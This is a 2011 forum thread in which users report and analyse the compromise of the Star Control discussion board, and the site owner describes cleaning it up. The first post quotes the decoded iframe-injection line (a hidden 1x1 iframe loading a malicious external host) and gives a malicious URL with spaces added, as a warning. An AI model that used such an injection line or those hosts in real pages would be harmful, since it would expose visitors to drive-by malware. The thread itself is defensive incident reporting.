Title: Star-control.com discussion board compromised Post by: Megagun on August 01, 2011, 06:17:03 pm It has come to my attention that the Star Control Discussion Board hosted on star-control.com has been compromised, and an iFrame has been injected that points towards locumresources.com
I advise you all to not visit the SCDB (and star-control.com) right now. It appears that the following bit of javascript will be executed if you do: http://pastebin.com/csA3wBAe I'll look into this further to see what exactly is happening. EDIT1: seems like the following bit of code injects the iframe: http://pastebin.com/xqN1Adqu This produces the following string: Code: document.write('<iframe src="http://locumresources.com/forum.php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"></iframe>') don't visit this locumresources.com URL using your browserThis string is then eval'd, which will embed the iframe. When your browser goes to locumresources.com, it fetches a page with a lot of random numbers, and the following bit of JavaScript: http://pastebin.com/x5D2RwKE Once executed, this bit of JavaScript produces the following: http://pastebin.com/csA3wBAe I'm currently decompiling the worms.jar file to see what it does. EDIT 2: A VirusTotal report on http : // locum resources .com /k.php ?f=20 &e=2 (one of the URLs referred to in the JavaScript mess. Spaces added to protect the innocent. Do not visit this URL if you're not sure what you're doing!) http://www.virustotal.com/file-scan/report.html?id=37e7b90d821bb14a45129c121510395547a2d1df8f4e262c7a1183e0c90e32d5-1312203813 Title: Re: Star-control.com discussion board compromised Post by: Dabir on August 01, 2011, 07:33:45 pm Well damn I just visited it. I visit it first. I didn't see any iframes, but the fonts were bugged up and php.bb was issuing debug notices complaining about headers having already been sent at the top. I'd go back and check, but right now I must scan my computer.
Title: Re: Star-control.com discussion board compromised Post by: Nuclear on August 01, 2011, 08:55:34 pm Same here, it was pretty natural for me to visit Star-Control.com first :(
Are those actual error codes? By the look of the pages source, they might have just been typed out. Title: Re: Star-control.com discussion board compromised Post by: Draxas on August 01, 2011, 09:22:21 pm Was wondering what was going on when I got all those broken script notices earlier. I also found that all the links to subforums were dead, and also kicking back broken script messages. I had no idea this had something to do with an attack site.
Well, it's my PC at work, so there's nothing I can do for it. If the virus and spyware protection here can't catch it, I'm pretty much stuck. Let us know when this gets resolved. Title: Re: Star-control.com discussion board compromised Post by: chenjesuwizard on August 02, 2011, 12:49:37 am I'm scanning my computer and I ran Rkill. Rkill picked up something called Reminder.exe. It was in C:/Program Files/TTG/Reminder.exe. (That may be slightly wrong, it's from memory). I deleted that file and hope it's that, not something else.
Title: Re: Star-control.com discussion board compromised Post by: oldlaptop on August 02, 2011, 03:39:08 am The SCDB front page looks clean to me now (some innocuous looking javascript probably generated by the forum software, no references to locumresouces.com anywhere), but the boards are still down. All links other than 'Board Index' and the board logo bring up an error that './cache is not writable', so I'd guess that databases have been taken down for checking.
Title: Re: Star-control.com discussion board compromised Post by: Admiral Zeratul on August 02, 2011, 05:02:26 am I've also seen two spam threads on this forum recently. Could it be related somehow?
Title: Re: Star-control.com discussion board compromised Post by: oldlaptop on August 02, 2011, 05:49:10 am SCDB is back up.
Title: Re: Star-control.com discussion board compromised Post by: Angelfish on August 02, 2011, 08:27:24 am SCDB is back up. That's dangerous to say. But can we visit it without risk of getting infected? Yesterday at home it caused various virus mentions. Title: Re: Star-control.com discussion board compromised Post by: Megagun on August 02, 2011, 02:37:34 pm It's gone now, yes. I checked with Firefox and NoScript enabled. The bit that inserts the iframe is gone now.
However, it could be that whoever inserted that iframe has removed it himself, perhaps because he has succeeded in his goal (steal an Admin account so that he now has access to the database/php scripts?). Unless some SCDB Admin comes forward and tells us that he's removed the offending bit of javascript, I wouldn't trust the SCDB. Title: Re: Star-control.com discussion board compromised Post by: Draxas on August 02, 2011, 04:02:57 pm I'm guessing Luki would be the most likely to show up here. Until he (or Chad, or whoever) shows up, I guess I'll keep away for a while.
Title: Re: Star-control.com discussion board compromised Post by: Anthony on August 02, 2011, 06:38:53 pm At least the code was removed. I got ESET on my computers and the sites got blocked and it even alerted me when I looked at the code in pastebin.
(http://i54.tinypic.com/axzf37.png) (http://i53.tinypic.com/33k95jb.png) The virus info from the ESET website said it's an exploit that can run "arbitrary code" on the user's PC - http://www.eset.eu/encyclopaedia/js-exploit-javadepkit-a-java-cve-2010-0886-a-javaws-bloodhound-292?lng=en Hopefully, nobody lost anything or got their PC infected. Title: Re: Star-control.com discussion board compromised Post by: meep-eep on August 02, 2011, 07:12:47 pm My observations and conclusions:
My advise:
Also, the spam on the UQM forum is just that, spam. Annoying, but relatively harmless. This happens quite frequently and is usually removed quickly enough. Disclaimer: While IT security is what I do professionally; I have not thoroughly investigated this attack. YMMV. Title: Re: Star-control.com discussion board compromised Post by: Lukipela on August 02, 2011, 07:56:28 pm Just back from non-internet land and something like this is here to spoil my day. All I know is that the site was indeed hacked and that Chad thinks he has fixed it. I've paged him to this thread, so hopefully he'll be able to clarify things more thoroughly than me. All I know is that he has locked down most things, I've no longer got FTP access to the site.
Title: Re: Star-control.com discussion board compromised Post by: Chad on August 02, 2011, 09:00:10 pm Megagun, thank you for letting everyone know.
Yes, when I got home on 8/1, I noticed exploit warnings being flagged by my virus scanner while using my browser. Then I figured it out it was coming from the browser tab running SCDB. I'm fairly certain the compromise happened on 8/1 and I was done cleaning it up on 8/1. I spent several hours analyzing and restoring. I removed ftp access and changed account password(s). It looks like something got in and changed index.* and login.* throughout all directories to contain the malicious code. It seems automated. I went through every single directory and restored the indexes from backup and then re-downloaded the entire contents of the site and virus scanned it again to make sure the files no longer had any malicious code. I have no idea how they got in and if anyone has any ideas on how to figure that out, I'd love the help. Sorry for any trouble, stuff like this just sucks. Title: Re: Star-control.com discussion board compromised Post by: Arne on August 03, 2011, 09:49:51 pm Was the forum software is up to date?
Title: Re: Star-control.com discussion board compromised Post by: Chad on August 04, 2011, 02:08:19 pm No but, it is now.
Title: Re: Star-control.com discussion board compromised Post by: jucce on August 06, 2011, 08:44:41 pm I have no idea how they got in and if anyone has any ideas on how to figure that out, I'd love the help. Do you have access to any logs which can show ftp or http access? Does the forum share a server with other sites?Sorry for any trouble, stuff like this just sucks. |